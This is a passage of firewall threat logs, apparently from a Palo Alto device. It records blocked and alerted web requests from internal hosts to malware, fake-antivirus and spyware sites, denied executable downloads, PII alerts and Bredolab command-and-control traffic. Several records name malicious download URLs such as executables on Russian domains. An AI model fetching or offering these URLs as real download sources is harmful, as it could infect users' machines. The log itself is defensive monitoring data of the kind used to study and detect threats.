04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,"imagesrepository.com/resolution.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,"hottestfiles.com/search/search.php?q=xxx",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,"infodist1.com/in.cgi?11¶meter=404",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,"cls-softwares.com/suc.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,"cls-softwares.com/softwarefortubeview.40013.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,78.159.99.224,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,"findmorepill.com/klik/search.php?q=xxx",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0, -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,"allowedwebsurfing.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,"antivirus-remote.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.cfg",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,"blogsexnakedgirlxxx.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:47 1,2012/10/30 09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,69.43.161.167,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,"wantfinest.com/tds/in.cgi?default",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:38,192.168.0.2,202.31.187.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,"sameshitasiteverwas.com/traf/tds/in.cgi?2",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0, -Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,89.111.176.67,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,"svarkon.ru/update.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,"onlinescanxpp.com/land/eurl/1.php?code=",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:34,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,"nolagtime.com/gwc.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,"karavan.us/bon/index.php",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,"findnolimits.com/go.php?sid=1",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/moun.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/palast.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,204.232.231.46,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,"controller.php",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,216.8.179.25,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,"www.15min.it/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0, -Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,69.43.161.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,"tubemov.com/",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,208.91.196.252,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,"pagesinxt.com/?dn=teenstube.us&flrdr=yes&nxte=js",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0, -Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,"movfree.com/",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,"gometascan.com/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/download/Install_11-1.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,"FunkyEmoticons_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,122.226.169.183,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,"52hxw.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,"softsellfast.com/test/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,109.201.131.15,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,"setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,"Live-Player_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,"boialex.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,"edw-melon.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:51,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,"maximtushin.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, -Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,"marketingsoluchion.biz/fkn/config.bin",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,207.46.140.46,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,"default.aspx",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,65.54.161.34,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,"sck.aspx",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,65.55.5.231,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,"ADSAdClient31.dll",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,65.54.71.11,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,"c.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,74.125.239.17,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,188.190.124.75,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,"about.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 